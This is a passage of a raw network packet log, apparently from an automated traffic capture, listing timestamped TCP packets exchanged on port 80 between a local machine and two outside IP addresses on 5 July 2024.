                                                                Jul 5, 2024 04:23:16.368279934 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368289948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368302107 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.368303061 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368314981 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.368319035 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368324041 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368339062 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368341923 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.368350983 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368362904 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.368362904 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368376017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368386030 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368396044 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.368396044 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.368396997 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368419886 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368428946 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.368432045 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368442059 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.368443966 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368454933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368462086 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.368465900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368479013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368500948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368509054 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.368509054 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.368511915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368524075 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368530989 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.368535995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368542910 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.368547916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368560076 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368571043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368572950 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.368582010 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368587017 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.368594885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368606091 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368612051 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.368616104 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368628979 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368639946 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368639946 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.368649960 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.368654013 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.368674994 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.368690014 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.415158033 CEST804974677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:16.415229082 CEST4974680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:16.456861019 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.456881046 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.456892014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.456938028 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.456959963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.456971884 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.456975937 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.456983089 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.456994057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457017899 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457053900 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457082987 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457093954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457103968 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457113981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457125902 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457133055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457144022 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457154036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457156897 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457166910 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457179070 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457179070 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457191944 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457221031 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457283020 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457367897 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457377911 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457389116 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457398891 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457433939 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457444906 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457458973 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457462072 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457474947 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457484007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457484961 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457493067 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457503080 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457506895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457551956 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457551956 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457578897 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457590103 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457598925 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457609892 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457623005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457623959 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457648993 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457659006 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457722902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457735062 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457745075 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457756042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457770109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457772017 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457787037 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457794905 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457798958 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457809925 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457812071 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457832098 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457833052 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457844019 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457855940 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457859993 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457865953 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457887888 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457890987 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457902908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457911968 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457911968 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457925081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457926035 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457935095 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.457956076 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.457977057 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458019972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458030939 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458040953 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458050966 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458065033 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458066940 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458091974 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458101988 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458201885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458213091 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458224058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458235025 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458244085 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458247900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458257914 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458260059 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458271980 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458281994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458283901 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458292007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458297968 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458332062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458339930 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458350897 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458360910 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458369970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458379030 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458390951 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458398104 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458401918 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458414078 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458420038 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458425999 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458439112 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458446980 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458472967 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458497047 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458508015 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458517075 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458528996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458539009 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458543062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458551884 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458568096 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458580017 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458607912 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458637953 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458647966 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458657026 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458666086 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458676100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458678007 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458686113 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458697081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458703995 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458723068 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458739042 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458791018 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458801985 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458818913 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458827972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458837986 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458838940 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458849907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458862066 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458862066 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458873034 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458874941 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458918095 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458945990 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.458950996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.458996058 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.459063053 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459074974 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459084988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459096909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459108114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459110022 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.459125996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459136009 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.459152937 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.459156990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459182978 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.459197998 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.459202051 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459213972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459245920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.459295988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459306955 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459316969 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459326982 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459338903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459343910 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.459356070 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459364891 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.459371090 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459379911 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.459383011 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459394932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459404945 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459414959 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.459419012 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459428072 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.459438086 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.459455013 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.459472895 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.520114899 CEST4974680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:16.520396948 CEST4974780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:16.525224924 CEST804974777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:16.525305033 CEST4974780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:16.525366068 CEST804974677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:16.525413990 CEST4974680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:16.525510073 CEST4974780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:16.530275106 CEST804974777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:16.548527956 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.548537016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.548624039 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.548634052 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.548645020 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.548667908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.548679113 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.548687935 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.548696041 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.548698902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.548743010 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.548754930 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.548849106 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.548860073 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.548875093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.548887014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.548897982 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.548902988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.548917055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.548932076 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.548939943 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.548981905 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549007893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549020052 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549029112 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549040079 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549050093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549053907 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549063921 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549077988 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549091101 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549130917 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549158096 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549169064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549179077 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549192905 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549202919 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549223900 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549262047 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549289942 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549302101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549310923 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549323082 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549333096 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549336910 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549345016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549355030 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549360991 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549374104 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549381971 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549392939 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549396038 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549407005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549417973 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549422979 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549428940 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549439907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549444914 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549452066 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549463987 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549489021 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549650908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549663067 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549673080 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549683094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549694061 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549700022 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549711943 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549738884 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549817085 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549829006 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549838066 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549848080 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549856901 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549865007 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549870968 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549881935 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549884081 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549892902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549896002 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549905062 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549916029 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549921036 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549926996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549937963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549947977 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549949884 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.549958944 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.549984932 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550003052 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550168037 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550179005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550209045 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.550343037 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550354004 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.550364017 CEST804973285.28.47.30192.168.2.4
